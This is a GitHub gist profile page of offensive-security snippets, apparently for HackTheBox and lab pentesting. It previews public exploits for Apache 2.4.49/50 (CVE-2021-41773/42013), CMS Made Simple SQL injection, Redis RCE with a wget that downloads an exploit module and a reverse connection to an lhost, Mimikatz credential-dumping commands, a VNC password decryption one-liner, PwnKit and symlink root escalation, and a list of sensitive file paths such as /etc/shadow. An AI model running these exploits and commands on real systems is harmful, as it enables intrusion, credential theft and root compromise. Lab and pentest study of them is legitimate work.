Skip to content

Instantly share code, notes, and snippets.

View strikoder's full-sized avatar
:shipit:
Imposter Syndrome

$tr!k0d3r strikoder

:shipit:
Imposter Syndrome
View GitHub Profile
# !/usr/bin/python3
# Author: Ravin | Blacknote
# Link: https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution/blob/main/exploit.py
# CVE-2021-41773 | CVE-2021-42013
# Apache HTTP Server 2.4.49-2.4.50 - Path Traversal & Remote Code Execution
# Usage:
# in some cases, reading files or rce might fail, so try both of them
# python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 rce 'id'
# python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 file '/etc/passwd'
@strikoder
strikoder / cmsms_2.2.9_sqli.py
Created October 23, 2025 17:30
cmsms 2.2.9 exploit (CVE-2019-9053)
#!/usr/bin/env python3
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Original-Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group (https://gist.github.com/pdelteil/6ebac2290a6fb33eea1af194485a22b1)
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
# Usage: python3 cmsms_2.2.9_sqli.py -u http://$IP/simple/ -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt -c
@strikoder
strikoder / Redis RCE 4.x, 5.x (port 6379).sh
Last active December 25, 2025 08:27
Redis 4.x/5.x RCE - port 6379 (<=5.0.9) Exploit
# First, install this .so
```
wget -O exp.so https://github.com/strikoder/OffensiveSecurity/raw/refs/heads/main/CVES/exp.so
```
# Then, save the next python file (source: https://github.com/Ridter/redis-rce/blob/master/redis-rce.py)
# try other ports if 80 didn't work
# and run it python3 payload.py --rhost 192.168.209.176 --lhost 192.168.45.238 --lport 80 --rport 6379 --file exp.so
```payload.py
#!/usr/bin/env python
@strikoder
strikoder / Mimikatz commands
Created November 1, 2025 16:41
Mimikatz basic commands tested on a home-made lab
################################################################################
# Mimikatz — Quick Commands & Explanations (lab: `pentest.local`)
# Video's Link: https://youtu.be/XPxqZFaC0xE
# Lab assumptions: domain `pentest.local`, DC `LAB-DC`, hosts `LAB-FINANCE`, `LAB-MEDIA`.
# Run Mimikatz as Administrator / SYSTEM and use the x64 build on x64 hosts.
################################################################################
## BASICS — setup & checks
# show mimikatz version (verify x64 build)
mimikatz # version
@strikoder
strikoder / vnc password decryption
Created November 15, 2025 06:22
Vnc Password Decryption (hex to clear pass)
# check HTB [Cascade](https://www.hackthebox.com/machines/cascade) for more info
# Step1: get your vnc pass (e.x:6b,cf,2a,4b,6e,5a,ca,0f)
# Step2: remove the comma => 6bcf2a4b6e5aca0f
# step3: use this one liner
```bash
echo -n [6bcf2a4b6e5aca0f:the value from above] | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
```
## [More info](https://github.com/frizb/PasswordDecrypts) on VNC
@strikoder
strikoder / popular_nxc_errors.md
Last active December 23, 2025 15:18
Common NetExec (nxc) Kerberos errors and quick fixes
@strikoder
strikoder / below linux privilege escalation(CVE-2025-27591).md
Created November 17, 2025 07:26
CVE-2025-27591 PoC: Below (≤0.8.1) symlink privilege escalation exploit.

Below Privilege Escalation Exploit

Vulnerability Information

Affected Software: below monitoring tool
Vulnerable Versions: <= 0.8.1 (possibly < 0.9.0)
Vulnerability Type: Symlink-based privilege escalation
CVE: CVE-2025-27591-PoC Source: HackTheBox - Outbound machine

@strikoder
strikoder / CVE-2021-4034: PwnKit - Polkit pkexec Local Privilege Escalation.md
Last active December 21, 2025 10:50
Local privilege escalation exploit for polkit pkexec vulnerability (CVE-2021-4034). Grants root shell on vulnerable Linux systems.

CVE-2021-4034 PwnKit Exploit

Local privilege escalation exploit for polkit pkexec vulnerability (CVE-2021-4034). Grants root shell on vulnerable Linux systems.

Check if Vulnerable

/usr/bin/pkexec --version  # ≤ 0.120
uname -r # 5.3.0-42 5.4.0-107 OR cat /etc/issue
ls -la /usr/bin/pkexec      # Should have SUID bit
@strikoder
strikoder / Windows & Linux File Paths Reference.md
Last active December 1, 2025 20:29
Windows & Linux sensitive file paths for penetration testing - includes webroot locations, config files, logs, and SQL injection LOAD_FILE payloads for common services (IIS, Apache, Nginx, XAMPP, WAMP, Jenkins, FTP, SSH)

Linux & Windows Sensitive Paths Cheatsheet

LINUX

Files

/etc/passwd
/etc/shadow
/etc/profile
/etc/issue
@strikoder
strikoder / notion-clean-sidebar.css
Created December 1, 2025 07:17
Clean Notion Sidebar - Remove default navigation items, workspace switcher, and dividers for a minimal sidebar experience
/*
* Clean Notion Sidebar
* Removes default navigation items and workspace switcher for a cleaner look
*
* How to use:
* 1. Install Stylus extension (Chrome/Firefox/Edge)
* 2. Create new style in Stylus
* 3. Copy and paste this CSS
* 4. Set to apply to domain: notion.so
* 5. Save and refresh Notion